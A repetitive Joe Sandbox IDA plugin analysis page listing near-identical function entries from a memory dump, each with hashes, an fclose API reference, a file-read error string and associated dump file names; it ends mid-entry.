Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
Instruction ID: 8a30ba5028368a2d64a71a5336cbb639696dbe2fe864b7a0b5a8a411139bc4a8
Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
Instruction Fuzzy Hash: CEF05E23B0C20351F992BA69F4417BD12512F8E765E4A1536CD6CCBBE3EE3DA8878200

Function 00007FF64B934886 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
Instruction ID: ac61f1081a1543cb7b3b3d49ec47d6bb89a66236b290778e49c4a238f751cb13
Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
Instruction Fuzzy Hash: EAF05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934890 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
Instruction ID: ea937c98fd522ef77df8b19c2cd2bf04e968d66506248e9205fb5c2fad4356ef
Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
Instruction Fuzzy Hash: 7CF05E23B0C20351F992BA69F4407BD52512F8E765E4A1536CD5CCBBE3EE3DA8878210

Function 00007FF64B9347BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
Instruction ID: 8a30ba5028368a2d64a71a5336cbb639696dbe2fe864b7a0b5a8a411139bc4a8
Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
Instruction Fuzzy Hash: CEF05E23B0C20351F992BA69F4417BD12512F8E765E4A1536CD6CCBBE3EE3DA8878200

Function 00007FF64B9347C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
Instruction ID: ac61f1081a1543cb7b3b3d49ec47d6bb89a66236b290778e49c4a238f751cb13
Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
Instruction Fuzzy Hash: EAF05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B9347D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
Instruction ID: ea937c98fd522ef77df8b19c2cd2bf04e968d66506248e9205fb5c2fad4356ef
Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
Instruction Fuzzy Hash: 7CF05E23B0C20351F992BA69F4407BD52512F8E765E4A1536CD5CCBBE3EE3DA8878210

Function 00007FF64B93475D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
Instruction ID: 769905a02f93f4641b0fa277ade33fa2edf65550ec77602944cc6a91a029ed31
Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
Instruction Fuzzy Hash: AFF05E23B0C20351F992BA69F4407BD12512F8E761E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934767 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
Instruction ID: 29ae5b9a9fc11dc39a275a538e1ae2b7df3e3f448d2934274b8c77f8e487061f
Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
Instruction Fuzzy Hash: A4F05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934771 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
Instruction ID: 8a30ba5028368a2d64a71a5336cbb639696dbe2fe864b7a0b5a8a411139bc4a8
Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
Instruction Fuzzy Hash: CEF05E23B0C20351F992BA69F4417BD12512F8E765E4A1536CD6CCBBE3EE3DA8878200

Function 00007FF64B9347A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
Instruction ID: 769905a02f93f4641b0fa277ade33fa2edf65550ec77602944cc6a91a029ed31
Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
Instruction Fuzzy Hash: AFF05E23B0C20351F992BA69F4407BD12512F8E761E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B9347B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
Instruction ID: 29ae5b9a9fc11dc39a275a538e1ae2b7df3e3f448d2934274b8c77f8e487061f
Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
Instruction Fuzzy Hash: A4F05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B93477B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
Instruction ID: ac61f1081a1543cb7b3b3d49ec47d6bb89a66236b290778e49c4a238f751cb13
Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
Instruction Fuzzy Hash: EAF05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934785 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
Instruction ID: ea937c98fd522ef77df8b19c2cd2bf04e968d66506248e9205fb5c2fad4356ef
Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
Instruction Fuzzy Hash: 7CF05E23B0C20351F992BA69F4407BD52512F8E765E4A1536CD5CCBBE3EE3DA8878210

Function 00007FF64B934B8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 419855de458aef800a4480a83e71539b6b86dfe63857b706560499ad0ef83724
Instruction ID: 32cf6458f8114433f848d3c2157e8e340066c80160ae7a6a035e346069e858ae
Opcode Fuzzy Hash: 419855de458aef800a4480a83e71539b6b86dfe63857b706560499ad0ef83724
Instruction Fuzzy Hash: E8F05E23B0C20351F993BA69F4407BD12512F8E765E4A1532CD5CCBBE3EE3DA8868200

Function 00007FF64B934B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
Instruction ID: f8712e8cac7d4c0b0a1e049d333f0a1101189842b21791314c3d0909f586558c
Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
Instruction Fuzzy Hash: 45F05E23B0C20351F993BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934B0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
Instruction ID: f8712e8cac7d4c0b0a1e049d333f0a1101189842b21791314c3d0909f586558c
Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
Instruction Fuzzy Hash: 45F05E23B0C20351F993BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B934B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
Instruction ID: f8712e8cac7d4c0b0a1e049d333f0a1101189842b21791314c3d0909f586558c
Opcode Fuzzy Hash: c622d2d5a7b4549b084282044c813153a244fbb32cbc357716c84ccd8b5b41e2
Instruction Fuzzy Hash: 45F05E23B0C20351F993BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200

Function 00007FF64B93499C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF64B934B30

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
fs_file_read, xrefs: 00007FF64B934B65

Memory Dump Source

